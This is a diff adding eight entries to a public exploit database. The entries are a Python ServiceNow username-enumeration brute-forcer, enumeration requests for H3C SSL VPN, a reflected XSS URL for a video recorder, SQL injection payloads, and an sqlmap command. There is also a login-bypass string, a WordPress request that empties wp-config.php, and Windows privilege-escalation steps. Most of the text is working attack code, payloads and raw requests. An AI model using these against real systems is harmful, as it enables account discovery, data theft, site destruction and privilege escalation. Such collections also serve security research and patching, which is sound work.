DB: 2022-02-17

8 changes to exploits/shellcodes

TeamSpeak 3.5.6 - Insecure File Permissions
Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path

H3C SSL VPN - Username Enumeration
Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
ServiceNow - Username Enumeration
Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)

exploits/hardware/remote/50742.txt

@@ -0,0 +1,68 @@
+# Exploit Title: H3C SSL VPN - Username Enumeration
+# Exploit Author: LiquidWorm
+
+H3C SSL VPN Username Enumeration
+
+
+Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.
+Product web page: https://www.h3c.com
+Affected version: n/a
+
+Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees
+to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a
+new generation of professional SSL VPN devices for enterprises. They can function as ingress
+gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are
+for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized
+enterprises.
+
+Desc: The weakness is caused due to the login script and how it verifies provided credentials. An
+attacker can use this weakness to enumerate valid users on the affected application via 'txtUsrName'
+POST parameter.
+
+Tested on: ssl vpn gateway HttpServer 1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5697
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php
+
+
+24.01.2022
+
+--
+
+
+Non-valid:
+----------
+
+POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
+
+txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
+
+
+		<tr><td align="center">User is not exist</TD></TR>
+
+
+
+Valid:
+------
+
+POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
+
+txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
+
+		<tr><td align="center">Input password incorrect</TD></TR>
+
+
+
+Valid:
+------
+
+POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
+
+txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
+
+		<tr><td align="center">Local user state is inactive</TD></TR>

exploits/hardware/webapps/50744.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
+# Author: Luis Martinez
+# Discovery Date: 2022-02-13
+# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
+# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
+# Tested Version: NVR304-16EP
+# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
+# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
+# CVE: N/A
+
+# Proof of Concept:
+
+http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>

exploits/multiple/webapps/50741.py

@@ -0,0 +1,151 @@
+# Exploit Title: ServiceNow - Username Enumeration
+# Google Dork: NA
+# Date: 12 February 2022
+# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
+# Author Github Page: https://9lyph.github.io/CVE-2021-45901/
+# Vendor Homepage: https://www.servicenow.com/
+# Software Link: https://docs.servicenow.com/bundle/orlando-servicenow-platform/page/product/mid-server/task/t_DownloadMIDServerFiles.html
+# Version: Orlando
+# Tested on: MAC OSX
+# CVE : CVE-2021-45901
+
+#!/usr/local/bin/python3
+# Author: Victor Hanna (SpiderLabs)
+# User enumeration script SNOW
+# Requires valid 1. JSESSION (anonymous), 2. X-UserToken and 3. CSRF Token
+
+import requests
+import re
+import urllib.parse
+from colorama import init
+from colorama import Fore, Back, Style
+import sys
+import os
+import time
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+def banner():
+    print ("[+]********************************************************************************[+]")
+    print ("|   Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t    |")
+    print ("|   Decription: SNOW Username Enumerator                                            |")
+    print ("|   Usage : "+sys.argv[0]+"                                                        |")
+    print ("|   Prequisite: \'users.txt\' needs to contain list of users                          |")
+    print ("[+]********************************************************************************[+]")
+
+def main():
+    os.system('clear')
+    banner()
+    proxies = {
+        "http":"http://127.0.0.1:8080/",
+        "https":"http://127.0.0.1:8080/"
+    }
+    url = "http://<redacted>/"
+    try:
+        # s = requests.Session()
+        # s.verify = False
+        r = requests.get(url, timeout=10, verify=False, proxies=proxies)
+        JSESSIONID = r.cookies["JSESSIONID"]
+        glide_user_route = r.cookies["glide_user_route"]
+        startTime = (str(time.time_ns()))
+        # print (startTime[:-6])
+    except requests.exceptions.Timeout:
+        print ("[!] Connection to host timed out !")
+        sys.exit(1)
+    except requests.exceptions.ProxyError:
+        print ("[!] Can't communicate with proxy !")
+        sys.exit(1)
+
+    with open ("users.txt", "r") as f:
+        usernames = f.readlines()
+        print (f"[+] Brute forcing ....")
+        for users in usernames:
+            url = "http://<redacted>/$pwd_reset.do?sysparm_url=ss_default"
+            headers1 = {
+                "Host": "<redacted>",
+                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
+                "Accept": "*/*",
+                "Accept-Language": "en-US,en;q=0.5",
+                "Accept-Encoding": "gzip, deflate",
+                "Connection": "close",
+                "Cookie": "glide_user_route="+glide_user_route+"; JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime[:-6]+"\'"
+                }
+
+            try:
+                # s = requests.Session()
+                # s.verify = False
+                r = requests.get(url, headers=headers1, timeout=20, verify=False, proxies=proxies)
+                obj1 = re.findall(r"pwd_csrf_token", r.text)
+                obj2 = re.findall(r"fireAll\(\"ck_updated\"", r.text)
+                tokenIndex = (r.text.index(obj1[0]))
+                startTime2 = (str(time.time_ns()))
+                # userTokenIndex = (r.text.index(obj2[0]))
+                # userToken = (r.text[userTokenIndex+23 : userTokenIndex+95])
+                token = (r.text[tokenIndex+45:tokenIndex+73])
+                url = "http://<redacted>/xmlhttp.do"
+                headers2 = {
+                    "Host": "<redacted>",
+                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
+                    "Accept": "*/*",
+                    "Accept-Language": "en-US,en;q=0.5",
+                    "Accept-Encoding": "gzip, deflate",
+                    "Referer": "http://<redacted>/$pwd_reset.do?sysparm_url=ss default",
+                    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+                    "Content-Length": "786",
+                    "Origin": "http://<redacted>/",
+                    "Connection": "keep-alive",
+                    # "X-UserToken":""+userToken+"",
+                    "Cookie": "glide_user_route="+glide_user_route+";JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime2[:-6]+"\'"
+                    }
+
+                data = {
+                    "sysparm_processor": "PwdAjaxVerifyIdentity",
+                    "sysparm_scope": "global",
+                    "sysparm_want_session_messages": "true",
+                    "sysparm_name":"verifyIdentity",
+                    "sysparm_process_id":"c6b0c20667100200a5a0f3b457415ad5",
+                    "sysparm_processor_id_0":"fb9b36b3bf220100710071a7bf07390b",
+                    "sysparm_user_id_0":""+users.strip()+"",
+                    "sysparm_identification_number":"1",
+                    "sysparam_pwd_csrf_token":""+token+"",
+                    "ni.nolog.x_referer":"ignore",
+                    "x_referer":"$pwd_reset.do?sysparm_url=ss_default"
+                    }
+
+                payload_str = urllib.parse.urlencode(data, safe=":+")
+
+            except requests.exceptions.Timeout:
+                print ("[!] Connection to host timed out !")
+                sys.exit(1)
+
+            try:
+                # s = requests.Session()
+                # s.verify = False
+                time.sleep(2)
+                r = requests.post(url, headers=headers2, data=payload_str, timeout=20, verify=False, proxies=proxies)
+                if "500" in r.text:
+                    print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)
+                    f = open("enumeratedUserList.txt", "a+")
+                    f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)
+                    f.close()
+                elif "200" in r.text:
+                    print (Fore.GREEN + f"[+] Valid user: {users.strip()}" + Style.RESET_ALL)
+                    f = open("enumeratedUserList.txt", "a+")
+                    f.write(Fore.GREEN + f"[+] Valid user: {users.strip()}\n" + Style.RESET_ALL)
+                    f.close()
+                else:
+                    print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)
+                    f = open("enumeratedUserList.txt", "a+")
+                    f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)
+                    f.close()
+            except KeyboardInterrupt:
+                sys.exit()
+            except requests.exceptions.Timeout:
+                print ("[!] Connection to host timed out !")
+                sys.exit(1)
+            except Exception as e:
+                print (Fore.RED + f"Unable to connect to host" + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    main ()

exploits/php/webapps/50739.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
+# Date: 11/02/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: XAMPP, Windows 10
+
+
+# Vulnerable Code
+
+line 2 in file "mvogms/products/view_product.php
+
+$qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");
+
+# Sqlmap command:
+
+sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
+
+# Output:
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: page=products/view_product&id=3' AND 9973=9973-- ogag
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ

exploits/php/webapps/50740.txt

@@ -0,0 +1,45 @@
+# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
+# Date: 11/02/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
+# Version: 1.0
+# Tested on: XAMPP, Linux
+
+
+
+
+# Vulnerable Code
+
+line 57 in file "/sqgs/Actions.php"
+
+@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
+
+
+Steps To Reproduce:
+* - Go to the login page http://localhost/sqgs/login.php
+
+Payload:
+
+username: admin ' or '1'='1'#--
+password: \
+
+
+
+Proof of Concept :
+
+POST /sqgs/Actions.php?a=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 51
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/sqgs/login.php
+Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
+
+username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi

exploits/php/webapps/50746.txt

@@ -0,0 +1,45 @@
+# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
+# Date: 09-11-2021
+# Exploit Author: Ceylan Bozogullarindan
+# Exploit Website: https://bozogullarindan.com
+# Vendor Homepage: https://bestwebsoft.com/
+# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
+# Version: 1.1.1
+# Tested on: Linux
+# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)
+
+
+# Description:
+
+Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!
+
+I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users.
+
+An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.
+
+# Steps To Reproduce
+
+1. Install and activate the plugin.
+2. Click the "Log Monitor" available under Error Log Viewer menu item.
+3. Choose a log file to clear.
+4. Intercept the request via Burp or any other local proxy tool.
+5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
+6. Check the content of the cleared file. You will see that the file is empty.
+
+
+# PoC - Supported Materials
+
+---------------------------------------------------------------------------
+POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
+Host: 127.0.0.1:8000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 603
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cookie: [admin+]
+
+rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
+---------------------------------------------------------------------------

exploits/windows/local/50743.txt

@@ -0,0 +1,60 @@
+# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
+# Date: 2022-02-15
+# Exploit Author: Aryan Chehreghani
+# Contact: aryanchehreghani@yahoo.com
+# Vendor Homepage: https://www.teamspeak.com
+# Software Link: https://www.teamspeak.com/en/downloads
+# Version: 3.5.6
+# Tested on: Windows 10 x64
+
+# [ About - TeamSpeak ]:
+#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
+#application for audio communication between users on a chat channel,
+#much like a telephone conference call, Users typically use headphones with a microphone,
+#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
+#The target audience for TeamSpeak is gamers, who can use the software to communicate,
+#with other players on the same team of a multiplayer video game,
+#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.
+
+# [ Description ]:
+#The TeamSpeak Application was installed with insecure file permissions.
+#It was found that all folder and file permissions were incorrectly configured during installation.
+#It was possible to replace the service binary.
+
+# [ POC ]:
+
+C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe
+
+createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
+                    BUILTIN\Administrators:(F)
+                    WIN-FREMP1UB3LB\Administrator:(F)
+
+error_report.exe NT AUTHORITY\SYSTEM:(F)
+                 BUILTIN\Administrators:(F)
+                 WIN-FREMP1UB3LB\Administrator:(F)
+
+package_inst.exe NT AUTHORITY\SYSTEM:(F)
+                 BUILTIN\Administrators:(F)
+                 WIN-FREMP1UB3LB\Administrator:(F)
+
+QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
+                       BUILTIN\Administrators:(F)
+                       WIN-FREMP1UB3LB\Administrator:(F)
+
+ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
+                    BUILTIN\Administrators:(F)
+                    WIN-FREMP1UB3LB\Administrator:(F)
+
+Uninstall.exe NT AUTHORITY\SYSTEM:(F)
+              BUILTIN\Administrators:(F)
+              WIN-FREMP1UB3LB\Administrator:(F)
+
+update.exe NT AUTHORITY\SYSTEM:(F)
+           BUILTIN\Administrators:(F)
+           WIN-FREMP1UB3LB\Administrator:(F)
+
+Successfully processed 7 files; Failed processing 0 files
+
+# [ Exploit - Privilege Escalation ]:
+#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...
+#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)

exploits/windows/local/50745.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2022-02-13
+# Vendor Homepage: https://www.emerson.com/en-us
+# Software Link : https://www.opertek.com/descargar-software/?prc=_326
+# Tested Version: 9.80 Build 8695
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """
+
+Trapi File Server	TrapiServer	C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe	Auto
+
+
+# Service info:
+
+C:\>sc qc TrapiServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: TrapiServer
+        TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Trapi File Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

files_exploits.csv

@@ -11439,6 +11439,8 @@ id,file,description,date,author,type,platform,port
 50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos,
 50708,exploits/windows/local/50708.txt,"FLAME II MODEM USB - Unquoted Service Path",1970-01-01,"Ismael Nava",local,windows,
 50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
+50743,exploits/windows/local/50743.txt,"TeamSpeak 3.5.6 - Insecure File Permissions",1970-01-01,"Aryan Chehreghani",local,windows,
+50745,exploits/windows/local/50745.txt,"Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18607,6 +18609,7 @@ id,file,description,date,author,type,platform,port
 50665,exploits/windows/remote/50665.txt,"Archeevo 5.0 - Local File Inclusion",1970-01-01,"Miguel Santareno",remote,windows,
 50688,exploits/windows/remote/50688.txt,"Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion",1970-01-01,"Jonah Tan",remote,windows,
 50720,exploits/windows/remote/50720.py,"Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,notcos,remote,windows,
+50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",1970-01-01,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44813,3 +44816,8 @@ id,file,description,date,author,type,platform,port
 50735,exploits/php/webapps/50735.txt,"WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
 50736,exploits/php/webapps/50736.txt,"Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,php,
 50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",1970-01-01,"Aryan Chehreghani",webapps,php,
+50739,exploits/php/webapps/50739.txt,"Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection",1970-01-01,"Saud Alenazi",webapps,php,
+50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",1970-01-01,"Saud Alenazi",webapps,php,
+50741,exploits/multiple/webapps/50741.py,"ServiceNow - Username Enumeration",1970-01-01,"Victor Hanna",webapps,multiple,
+50744,exploits/hardware/webapps/50744.txt,"Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware,
+50746,exploits/php/webapps/50746.txt,"WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,